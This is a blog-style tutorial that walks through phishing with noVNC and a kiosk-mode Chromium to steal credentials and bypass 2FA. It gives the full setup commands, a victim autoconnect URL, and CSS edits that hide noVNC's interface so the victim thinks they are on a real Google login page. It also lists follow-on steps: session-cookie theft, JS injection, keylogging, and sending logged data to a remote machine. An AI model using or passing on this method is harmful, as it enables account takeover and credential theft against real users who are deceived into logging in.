---
layout: post
title: Exploiting noVNC for 2FA Bypass
date: 2025-02-07
categories: [Exploits, noVNC]
tags: [Exploits, noVNC, 2FA Bypass]
permalink: /posts/Exploiting-noVNC-for-2FA-Bypass/
image:  
  path: /assets/img/thumbnails/No-VNC.png
---



# **Using noVNC for Credential Acquisition and Bypassing 2FA**

**noVNC** is both a **JavaScript library for VNC clients** and an application built on top of this library. Compatible with **any modern browser**, including mobile versions for iOS and Android, noVNC allows the web browser to function as a **VNC client**, enabling **remote access to a machine**.

So, how can we use noVNC to **acquire credentials** and **bypass 2FA**? Here's the process:

1. Set up a server with noVNC.
2. Start **Chromium** (or any other browser) in **Kiosk mode**.
3. Direct it to the desired website for user authentication (e.g., `accounts.google.com`).
4. Send the link to the target user. When they click the URL, they will access the **VNC session** without realizing it.
5. Since Chromium is configured in **Kiosk mode**, the user experience will appear as a normal web page.

---

## **Exploitation Possibilities**

The exploitation possibilities of this method are **vast**:

- **Inject JS** into the browser.
- Use an **HTTP proxy** connected to the browser to log all activities.
- **Terminate the VNC session** after user authentication.
- Capture the **browser session token** (Right-click > Inspect > Application > Cookies) after the user disconnects.
- Run a **background keylogger**.
- Or **get creative** and find other approaches (remember, the server is yours).

---

## **noVNC Setup and Demonstration**

### **1. Deploy a Kali Linux Instance**

Use any **cloud service provider** or deploy locally to set up a Linux machine. I will use **Kali Linux** for this demonstration because I prefer it, but you can choose any other Linux distribution you are comfortable with.

---

### **2. Install TigerVNC**

First, you need to install **VNC software**. I tested two options: **X11vnc** and **TigerVNC**. After several tests, I chose to use **TigerVNC**.

```shell
sudo apt update
sudo apt install tigervnc-standalone-server tigervnc-xorg-extension tigervnc-viewer
```

---

### **3. Set Up a VNC Password**

```shell
vncpasswd
```

On Kali Linux, I didn’t need to create the `xstartup` file, but if you encounter any errors, you can configure it manually.

```shell
nano ~/.vnc/xstartup
```

Paste or write the following:

```bash
#!/bin/sh
xrdb "$HOME/.Xresources"
xsetroot -solid grey
x-terminal-emulator -geometry 80x24+10+10 -ls -title "$VNCDESKTOP Desktop" &
x-window-manager &
# Fix to make GNOME work
export XKL_XMODMAP_DISABLE=1
/etc/X11/Xsession
```

Add execution permissions:

```shell
chmod +x ~/.vnc/xstartup
```

---

### **4. Restart the VNC Server**

Restart the VNC server, choosing the **screen size settings** according to your needs. noVNC automatically adjusts to the browser's screen size, but do your own testing.

```shell
vncserver -depth 32 -geometry 1920x1080
```

---

### **5. Download and Run noVNC**

```shell
git clone https://github.com/novnc/noVNC.git
```

OR

```shell
apt install novnc
```

Now run noVNC **locally** or **publicly**. Here are the commands:

- **Check the VNC server port:**

```shell
vncserver -list
```

Example: `5901`, `5902`, `5903`, etc.

- **Run noVNC:**

```shell
./noVNC/utils/novnc_proxy --vnc localhost:5901
```

- **Set up an SSH tunnel:**

```shell
ssh -L 6080:127.0.0.1:6080 root@server
```

- **Run publicly using port 8081:**

```shell
ufw allow http
./noVNC/utils/novnc_proxy --vnc 0.0.0.0:5901 --listen 8081
```

---

### **6. Access VNC and Run the Browser in Kiosk Mode**

Access your VNC and run the browser in **Kiosk mode**. I used **Chromium**, but you can use whatever suits your needs.

```shell
chromium --no-sandbox --app=https://gmail.com --kiosk
```

---

### **7. Send the URL to the "Victim" to Connect Automatically**

```shell
http://127.0.0.1:6080/vnc.html?autoconnect=true&password=YOUR-PASSWORD
```

The `autoconnect=true&password=VNCPASSWORD` will make the user authenticate automatically. If you want to rename the query parameter, you can modify the `vnc.html` file.

---

### **8. Modify the CSS to Remove Visual Elements**

noVNC displays a **custom loading page**, a **VNC control bar**, and some additional unnecessary visual elements that should be removed.

Open `vnc.html`, find the `divs` below, and add the CSS style shown.

```html
<!-- Hide unnecessary items -->
<div id="noVNC_control_bar_anchor" class="noVNC_vcenter" style="display:none;">
<div id="noVNC_status" style="display:none"></div>

<!-- Makes the loading page white -->
<div id="noVNC_transition" style="background-color:white;color:white">
```

---

## **Important Notes**

- **You are giving remote access to your machine!** It should not have anything valuable stored on it.
- Any logged data should likely be sent to a **remote machine**.
- **Do not use the root account.** Set up a restricted user account that uses the VNC service.
- Configure the **Kiosk mode** more restrictively.
